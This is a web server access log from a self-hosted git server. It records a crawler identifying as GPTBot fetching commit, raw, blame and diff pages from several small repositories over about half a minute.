git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" [Client 74.7.227.38] [Length 10798] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" [Client 74.7.227.38] [Length 10772] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/code-frequency" [Client 74.7.227.38] [Length 7527] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" -[17/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" [Client 74.7.227.38] [Length 10137] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" -[17/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" [Client 74.7.227.38] [Length 11837] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" -[17/Feb/2026:13:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" -[17/Feb/2026:13:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" -[17/Feb/2026:13:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 74.7.227.38] [Length 14561] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" -[17/Feb/2026:13:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 74.7.227.38] [Length 14561] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" -[17/Feb/2026:13:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" -[17/Feb/2026:13:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" [Client 74.7.227.38] [Length 10142] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" -[17/Feb/2026:13:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode" [Client 74.7.227.38] [Length 10142] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" -[17/Feb/2026:13:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20377] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" -[17/Feb/2026:13:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20378] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" -[17/Feb/2026:13:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" -[17/Feb/2026:13:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23928] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" -[17/Feb/2026:13:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" -[17/Feb/2026:13:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23929] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" -[17/Feb/2026:13:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" -[17/Feb/2026:13:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/recent-commits" [Client 74.7.227.38] [Length 7516] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 74.7.227.38] [Length 10927] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -[17/Feb/2026:13:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" -[17/Feb/2026:13:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode" -[17/Feb/2026:13:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" -[17/Feb/2026:13:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43164] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" -[17/Feb/2026:13:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" -[17/Feb/2026:13:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" -[17/Feb/2026:13:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 74.7.227.38] [Length 14649] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" -[17/Feb/2026:13:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" -[17/Feb/2026:13:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" -[17/Feb/2026:13:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" -[17/Feb/2026:13:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71403] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" -[17/Feb/2026:13:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode" [Client 74.7.227.38] [Length 10112] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" -[17/Feb/2026:13:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71403] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" -[17/Feb/2026:13:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" -[17/Feb/2026:13:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43163] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" -[17/Feb/2026:13:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" -[17/Feb/2026:13:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" [Client 74.7.227.38] [Length 11775] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" -[17/Feb/2026:13:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" -[17/Feb/2026:13:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 74.7.227.38] [Length 14610] [Gzip 6.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" -[17/Feb/2026:13:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" -[17/Feb/2026:13:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83.diff" [Client 74.7.227.38] [Length 24949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:13:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584.patch" [Client 74.7.227.38] [Length 798802] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f.diff" [Client 74.7.227.38] [Length 141056] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" -[17/Feb/2026:13:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" [Client 74.7.227.38] [Length 9859] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/README.md" -[17/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" -[17/Feb/2026:13:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/packages" [Client 74.7.227.38] [Length 7404] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity" [Client 74.7.227.38] [Length 8382] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects" [Client 74.7.227.38] [Length 7765] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" -[17/Feb/2026:13:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14198] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" -[17/Feb/2026:13:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 74.7.227.38] [Length 13782] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" -[17/Feb/2026:13:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" -[17/Feb/2026:13:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" [Client 74.7.227.38] [Length 14814] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components" -[17/Feb/2026:13:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16472] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 